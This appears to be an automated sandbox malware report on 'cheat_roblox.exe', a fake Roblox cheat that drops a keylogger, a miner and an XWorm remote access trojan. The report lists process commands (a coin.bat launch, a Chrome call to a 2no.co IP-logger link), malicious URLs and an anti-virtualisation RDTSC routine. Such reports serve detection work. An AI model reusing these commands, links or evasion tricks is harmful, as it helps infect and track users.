            Source: Keyloger.exe.0.dr, WPBnCaT3d8cYQmg.csHigh entropy of concatenated method names: 'XqbpRmwJ4LtIvAR', 'P0jTCqOar3cv9vv', 'cQ4yWoyO6QI0787', '_9bNc4FZpvPn2d8N', 'tSubarXMNHmpIgk', '_0QpL3D9FsZYYURB', 'e12J0P1bomhydt6', 'a8HR9xsSDvlWrSZ', 'fkNSnoNe84RdGzT', 'De6iaF9HVBWEBkc'
            Source: Keyloger.exe.0.dr, R0AwzNAU4OLQBy5.csHigh entropy of concatenated method names: '_8DVPMgIt5LmyReW', 'BZVAT9UWtB9Y41EBslDUkcaMcEz93wnp4TwFdsJAwNlh5HH3J22aeHQ4iYM26w4Bz', 'xRvMGytdQ2t0vvaBZmUAw8zGZw6lREIjCy8Hi0yW4uNgQnuaYaSOw4QBYq6OZfOm6', 'YZHXocKFTuIAqCnIKSsaOe8Bu7xKEX61eFFh0gCYv1doZqxiACFmQx8wx0U5Tmaxw', 'KseJ4CZxDxgasaIvvghOQYUtjhm1qNwU5KPV4WJnB97il4HcI4MBrgr30GaNE3nxx'
            Source: Keyloger.exe.0.dr, tUULgqwzOy3tsY4.csHigh entropy of concatenated method names: 'XyjKcb0SD0Rnsly', 'onnajoto1IWR83c', '_4JRwDCvuPsxAFxT', 'TUfvtJiSrFTFqfO', 'hKn7O9jilUma2Zw0Est6bw1gkRujD0aPP8Houzr8kpBXX8Is19SryYZ18XrIvaHfPSx1xl3SMjVYx3EGcSp', 'h4RQD1MY3oKURj7ED4KIYRKHKVX617yrfjpvxqbClLGSMVnQNaxibqcg3p41qk3VHfmtekuu5XcduvTUIrL', '_0W2Q7XRDNANGyYK7eYQ1CBoe0T8xbd2SwsQUxdTTxt63ViT6oSnfQrQtDAtoh5P5JHq9VyPg2PLPvvUYpYy', 'qDu4N9S6yNJjuF2IyC1Dipv55nveXbngGs3oU5y97y0gm1zMrkqsSs3csriArDoT7m4uVmnmZE7RcOPNSr2', 'XAGEDgUZ2PI2TXU92O0Frre9DggfBwEZw8SBXJzLTqRAXOPeOXIvKsXXvekl5fCqtfggq9yas1x0W6UAKyW', '_2yOrKM1R5TZHaIoRlmRHTfmfg0sAWQFAnGRUnIyLkL8leSVsnLbKF2mAFPNh8FY82TUpGr5X3XvinrE8GQD'
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_9F112.logJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeRDTSC instruction interceptor: First address: ED39F0 second address: ED3A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeWindow / User API: threadDelayed 1358Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-1880
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 7908Thread sleep time: -58693s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 7908Thread sleep time: -49877s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E240BC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E4FCA0 FindFirstFileExA,0_2_00007FF6E7E4FCA0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E416A4 VirtualQuery,GetSystemInfo,0_2_00007FF6E7E416A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeThread delayed: delay time: 58693Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeThread delayed: delay time: 49877Jump to behavior
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1335404161.000000000259A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.drBinary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E7E476D8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_0110D0F8 mov eax, dword ptr fs:[00000030h]4_2_0110D0F8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_0110D13C mov eax, dword ptr fs:[00000030h]4_2_0110D13C
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_011043AC mov ecx, dword ptr fs:[00000030h]4_2_011043AC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E50D20 GetProcessHeap,0_2_00007FF6E7E50D20
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E7E476D8
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E42510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6E7E42510
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E43354 SetUnhandledExceptionFilter,0_2_00007FF6E7E43354
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E43170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E7E43170
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_010E2F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_010E2F78
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_010EE378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_010EE378
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E558E0 cpuid 0_2_00007FF6E7E558E0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6E7E3A2CC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E40754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E40754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E251A4 GetVersionExW,0_2_00007FF6E7E251A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheat_roblox.exe PID: 7640, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheat_roblox.exe PID: 7640, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Native API            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		2
            Masquerading            		1
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		11
            Virtualization/Sandbox Evasion            		LSASS Memory221
            Security Software Discovery            		Remote Desktop Protocol12
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		NTDS11
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Software Packing            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync126
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484385 Sample: cheat_roblox.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 56 38 www.google.com 2->38 40 titanium.roblox.com 2->40 42 8 other IPs or domains 2->42 62 Malicious sample detected (through community Yara rule) 2->62 64 Antivirus detection for URL or domain 2->64 66 Antivirus detection for dropped file 2->66 68 8 other signatures 2->68 9 cheat_roblox.exe 12 2->9         started        signatures3 process4 file5 30 C:\Users\user\...\RobloxPlayerInstaller.exe, PE32 9->30 dropped 32 C:\Users\user\AppData\Local\...\Keyloger.exe, PE32 9->32 dropped 34 C:\Users\user\AppData\...\BitCoin_miner.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\msedge.exe, PE32 9->36 dropped 12 RobloxPlayerInstaller.exe 12 9->12         started        16 cmd.exe 1 14 9->16         started        process6 dnsIp7 56 edge-term4-ams2.roblox.com 128.116.21.4, 443, 49708, 49739 ROBLOX-PRODUCTIONUS United States 12->56 58 d2v57ias1m20gl.cloudfront.net 99.86.4.125, 443, 49711, 49712 AMAZON-02US United States 12->58 60 127.0.0.1 unknown unknown 12->60 70 Tries to detect virtualization through RDTSC time measurements 12->70 18 chrome.exe 9 16->18         started        21 cmd.exe 1 16->21         started        23 conhost.exe 16->23         started        signatures8 process9 dnsIp10 44 192.168.2.10 unknown unknown 18->44 46 192.168.2.16 unknown unknown 18->46 48 2 other IPs or domains 18->48 25 chrome.exe 18->25         started        28 conhost.exe 21->28         started        process11 dnsIp12 50 88.212.201.204, 443, 49743 UNITEDNETRU Russian Federation 25->50 52 counter.yadro.ru 88.212.202.52, 443, 49730, 49736 UNITEDNETRU Russian Federation 25->52 54 5 other IPs or domains 25->54

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            cheat_roblox.exe59%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            cheat_roblox.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.firmaprofesional.com/cps00%URL Reputationsafe
            http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://www.quovadisglobal.com/cps00%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl00%URL Reputationsafe
            http://repository.swisssign.com/0%URL Reputationsafe
            http://www.accv.es/legislacion_c.htm0U0%URL Reputationsafe
            https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
            http://ocsp.accv.es00%URL Reputationsafe
            http://www.quovadisglobal.com/cps0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%URL Reputationsafe
            http://crl.certigna.fr/certignarootca.crl010%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://www.accv.es000%URL Reputationsafe
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.06410463456530690%Avira URL Cloudsafe
            https://iplogger.org/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerP0%Avira URL Cloudsafe
            https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl0%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll1.2.11rbr0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerX0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/handshake.png0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer00%Avira URL Cloudsafe
            https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%Avira URL Cloudsafe
            https://client-telemetry.roblox.com0%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
            https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f832290%Avira URL Cloudsafe
            http://ocsp.accv.es0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0%Avira URL Cloudsafe
            https://setup.rbxcdn.com0%Avira URL Cloudsafe
            https://iplogger.org/privacy/0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl0%Avira URL Cloudsafe
            https://client-telemetry.roblox.comata0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH0%Avira URL Cloudsafe
            http://www.roblox.com/0%Avira URL Cloudsafe
            http://www.roblox.com0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloads0%Avira URL Cloudsafe
            https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS0%Avira URL Cloudsafe
            https://client-telemetry.roblox.cominatorey0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/logo-dark.png0%Avira URL Cloudsafe
            https://client-telemetry.roblox.comogs0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/brand.png0%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0%Avira URL Cloudsafe
            https://client-telemetry.roblox.come0%Avira URL Cloudsafe
            https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.06410463456530690%Avira URL Cloudsafe
            https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbees0%Avira URL Cloudsafe
            https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.0%Avira URL Cloudsafe
            http://bit.ly/1eMQ42U0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
            http://www.accv.es/legislacion_c.htm0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperads0%Avira URL Cloudsafe
            https://iplogger.org/rules/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio640%Avira URL Cloudsafe
            http://www.cert.fnmt.es/dpcs/0%Avira URL Cloudsafe
            https://s3.amazonaws.com/0%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe0%Avira URL Cloudsafe
            https://2no.co/100%Avira URL Cloudmalware
            https://ecsv2.roblox.com/client/pbe0%Avira URL Cloudsafe
            https://2no.co/redirect-2100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            counter.yadro.ru
            		88.212.202.52
            		truefalse
              		unknown
              a.nel.cloudflare.com
              		35.190.80.1
              		truefalse
                		unknown
                edge-term4-ams2.roblox.com
                		128.116.21.4
                		truefalse
                  		unknown
                  2no.co
                  		172.67.149.76
                  		truefalse
                    		unknown
                    cdn.iplogger.org
                    		104.21.4.208
                    		truefalse
                      		unknown
                      www.google.com
                      		142.250.184.228
                      		truefalse
                        		unknown
                        d2v57ias1m20gl.cloudfront.net
                        		99.86.4.125
                        		truefalse
                          		unknown
                          ecsv2.roblox.com
                          		unknown
                          		unknownfalse
                            		unknown
                            26.165.165.52.in-addr.arpa
                            		unknown
                            		unknownfalse
                              		unknown
                              client-telemetry.roblox.com
                              		unknown
                              		unknownfalse
                                		unknown
                                clientsettingscdn.roblox.com
                                		unknown
                                		unknownfalse
                                  		unknown
